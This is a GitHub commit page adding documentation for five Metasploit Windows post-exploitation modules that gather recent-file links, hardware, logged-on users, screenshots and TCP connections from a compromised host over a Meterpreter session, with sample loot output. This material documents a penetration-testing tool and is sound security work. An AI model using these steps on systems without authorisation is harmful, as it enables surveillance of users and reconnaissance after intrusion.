Skip to content

Commit

Permalink
Land rapid7#12707, more module docs
Browse files Browse the repository at this point in the history
  • Loading branch information
@h00die
h00die committed Dec 21, 2019
2 parents e037495 + 6b746e3 commit 155a2eb
Show file tree
Hide file tree
Showing 5 changed files with 299 additions and 0 deletions.
79 changes: 79 additions & 0 deletions documentation/modules/post/windows/gather/dumplinks.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,79 @@

## Vulnerable Application

The dumplinks module is a modified port of Harlan Carvey's lslnk.pl Perl script. This module will parse .lnk files from a user's
Recent Documents folder and Microsoft Office's Recent Documents folder, if present. Windows creates these link files automatically
for many common file types. The .lnk files contain time stamps, file locations, including share names, volume serial numbers, and more.

## Verification Steps

1. Start msfconsole
2. Get meterpreter session
3. Do: ```use post/windows/gather/dumplinks```
4. Do: ```set SESSION <session id>```
5. Do: ```run```

## Options

**SESSION**

The session to run the module on.


## Scenarios

### Windows 7 (6.1 Build 7601, Service Pack 1).

```
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49160) at 2019-12-11 15:45:16 -0700
msf > use post/windows/gather/dumplinks
msf post(windows/gather/dumplinks) > set SESSION 1
SESSION => 1
msf post(windows/gather/dumplinks) > run
[*] Running module against TEST-PC
[*] Extracting lnk files for user TEST at C:\Users\TEST\AppData\Roaming\Microsoft\Windows\Recent\...
[*] Processing: C:\Users\TEST\AppData\Roaming\Microsoft\Windows\Recent\myPasswords.lnk.
[*] Processing: C:\Users\TEST\AppData\Roaming\Microsoft\Windows\Recent\Network and Internet.lnk.
[*] No Recent Office files found for user TEST. Nothing to do.
[*] Post module execution completed
```

## Example of looted .lnk output

```
[*] exec: cat /root/.msf4/loot/20191211154832_default_192.168.1.10_host.windows.lnk_124491.txt
C:\Users\TEST\AppData\Roaming\Microsoft\Windows\Recent\myPasswords.lnk:
Access Time = 2019-12-11 23:44:39 -0700
Creation Date = 2019-12-11 23:44:39 -0700
Modification Time = 2019-12-11 23:44:39 -0700
Contents of C:\Users\TEST\AppData\Roaming\Microsoft\Windows\Recent\myPasswords.lnk:
Flags:
Shell Item ID List exists.
Shortcut points to a file or directory.
The shortcut has a relative path string.
The shortcut has working directory.
Attributes:
Target was modified since last backup.
Target file's MAC Times stored in lnk file:
Creation Time = 2019-12-11 23:44:30 -0700. (UTC)
Modification Time = 2019-12-11 23:44:30 -0700. (UTC)
Access Time = 2019-12-11 23:44:30 -0700. (UTC)
ShowWnd value(s):
SW_NORMAL.
SW_SHOWMAXIMIZED.
SW_SHOW.
SW_SHOWMINNOACTIVE.
SW_RESTORE.
Target file's MAC Times stored in lnk file:
Creation Time = 2019-12-11 23:44:30 -0700. (UTC)
Modification Time = 2019-12-11 23:44:30 -0700. (UTC)
Access Time = 2019-12-11 23:44:30 -0700. (UTC)
Shortcut file is on a local volume.
Volume Name =
Volume Type = Fixed
Volume SN = 0x548EF20B
Target path = C:\Users\TEST\Desktop\myPasswords.txt&..\..\..\..\..\Desktop\myPasswords.txtC:\Users\TEST\Desktop(
```
60 changes: 60 additions & 0 deletions documentation/modules/post/windows/gather/enum_devices.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,60 @@

## Vulnerable Application

Enumerate PCI hardware information from the registry. Please note this script will run through registry subkeys such as: 'PCI', 'ACPI',
'ACPI_HAL', 'FDC', 'HID', 'HTREE', 'IDE', 'ISAPNP', 'LEGACY'', LPTENUM', 'PCIIDE', 'SCSI', 'STORAGE', 'SW', and 'USB'; it will take time to
finish. It is recommended to run this module as a background job.

## Verification Steps

1. Start msfconsole
2. Get meterpreter session
3. Do: ```use post/windows/gather/enum_devices```
4. Do: ```set SESSION <session id>```
5. Do: ```run```

## Options

**SESSION**

The session to run the module on.


## Scenarios

### Windows 7 (6.1 Build 7601, Service Pack 1).

```
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49160) at 2019-12-11 15:45:16 -0700
msf > use post/windows/gather/enum_devices
msf post(windows/gather/enum_devices) > set SESSION 1
SESSION => 1
msf post(windows/gather/enum_devices) > run
[*] Enumerating hardware on TEST-PC
[+] Results saved in: /root/.msf4/loot/20191211161351_default_192.168.1.10_host.hardware_245183.txt
[*] Post module execution completed
```

## Example of looted output

```
[*] exec: cat /root/.msf4/loot/20191211161351_default_192.168.1.10_host.hardware_245183.txt
Device Information
==================
Device Description Driver Version Class Manufacturer Extra
------------------ -------------- ----- ------------ -----
ACPI Fixed Feature Button 6.1.7601.17514 System (Standard system devices)
ACPI x86-based PC 6.1.7600.16385 Computer (Standard computers)
AMD K8 Processor 6.1.7600.16385 Processor Advanced Micro Devices Common KVM processor
Beep LegacyDriver
CD-ROM Drive 6.1.7601.17514 CDROM (Standard CD-ROM drives) QEMU QEMU DVD-ROM ATA Device
CD/DVD File System Reader LegacyDriver
CNG LegacyDriver
Composite Bus Enumerator 6.1.7601.17514 System Microsoft
Disk drive 6.1.7600.16385 DiskDrive (Standard disk drives) Red Hat VirtIO SCSI Disk Device
...snip...
```
64 changes: 64 additions & 0 deletions documentation/modules/post/windows/gather/enum_logged_on_users.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,64 @@

## Vulnerable Application

This module will enumerate current and recently logged on Windows users.

## Verification Steps

1. Start msfconsole
2. Get meterpreter session
3. Do: ```use post/windows/gather/enum_logged_on_users```
4. Do: ```set SESSION <session id>```
5. Do: ```run```

## Options

**CURRENT**

Enumerate currently logged on users. Default: ```true```

**RECENT**

Enumerate Recently logged on users. Default: ```true```

**SESSION**

The session to run this module on.

## Scenarios

### Windows 7 (6.1 Build 7601, Service Pack 1).

```
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49196) at 2019-12-13 04:36:54 -0700
msf exploit(multi/handler) > use post/windows/gather/enum_logged_on_users
msf post(windows/gather/enum_logged_on_users) > set SESSION 1
SESSION => 1
msf post(windows/gather/enum_logged_on_users) > run
[*] Running against session 1
Current Logged Users
====================
SID User
--- ----
S-1-5-21-3113421791-4205713440-112141152-1000 TEST-PC\TEST
[+] Results saved in: /root/.msf4/loot/20191213054456_default_192.168.1.10_host.users.activ_424278.txt
Recently Logged Users
=====================
SID Profile Path
--- ------------
S-1-5-18 %systemroot%\system32\config\systemprofile
S-1-5-19 C:\Windows\ServiceProfiles\LocalService
S-1-5-20 C:\Windows\ServiceProfiles\NetworkService
S-1-5-21-3113421791-4205713440-112141152-1000 C:\Users\TEST
[*] Post module execution completed
```
46 changes: 46 additions & 0 deletions documentation/modules/post/windows/gather/screen_spy.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,46 @@
## Vulnerable Application

This module will incrementally take desktop screenshots from the
host. This allows for screen spying which can be useful to determine
if there is an active user on a machine, or to record the screen for
later data extraction.

Note: As of March, 2014, the `VIEW_CMD` option
has been removed in favor of the Boolean `VIEW_SCREENSHOTS` option,
which will control if (but not how) the collected screenshots will
be viewed from the Metasploit interface.

## Verification Steps

1. Start msfconsole
2. Get meterpreter session
3. Do: ```use post/windows/gather/screen_spy```
4. Do: ```set SESSION <session id>```
5. Do: ```run```

## Options

**SESSION**

The session to run the module on.

## Scenarios

### Windows 7 (6.1 Build 7601, Service Pack 1).

```
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49184) at 201 9-12-12 14:55:42 -0700
msf > use post/windows/gather/screen_spy
msf post(windows/gather/screen_spy) > set SESSION 1
SESSION => 1
msf post(windows/gather/screen_spy) > run
[*] Migrating to explorer.exe pid: 1908
[+] Migration successful
[*] Capturing 6 screenshots with a delay of 5 seconds
[*] Screen Spying Complete
[*] run loot -t screenspy.screenshot to see file locations of your newly acquired loot
[*] Post module execution completed
```
50 changes: 50 additions & 0 deletions documentation/modules/post/windows/gather/tcpnetstat.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,50 @@
## Vulnerable Application

This Module lists current TCP sessions.

## Verification Steps

1. Start msfconsole
2. Get meterpreter session
3. Do: ```use post/windows/gather/tcpnetstat```
4. Do: ```set SESSION <session id>```
5. Do: ```run```

## Options

**SESSION**

The session to run the module on.

## Scenarios

### Windows 7 (6.1 Build 7601, Service Pack 1).

```
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49184) at 201 9-12-12 14:55:42 -0700
msf > use post/windows/gather/tcpnetstat
msf post(windows/gather/tcpnetstat) > set SESSION 1
SESSION => 1
msf post(windows/gather/tcpnetstat) > run
[*] TCP Table Size: 412
[*] Total TCP Entries: 10
[*] Connection Table
================
STATE LHOST LPORT RHOST RPORT
----- ----- ----- ----- -----
ESTABLISHED 192.168.1.10 49184 192.168.1.3 4444
LISTEN 0.0.0.0 135 0.0.0.0 _
LISTEN 0.0.0.0 445 0.0.0.0 _
LISTEN 0.0.0.0 5357 0.0.0.0 _
LISTEN 0.0.0.0 49152 0.0.0.0 _
LISTEN 0.0.0.0 49153 0.0.0.0 _
LISTEN 0.0.0.0 49154 0.0.0.0 _
LISTEN 0.0.0.0 49155 0.0.0.0 _
LISTEN 0.0.0.0 49156 0.0.0.0 _
LISTEN 192.168.1.10 139 0.0.0.0 _
[*] Post module execution completed
```

0 comments on commit 155a2eb

Please sign in to comment.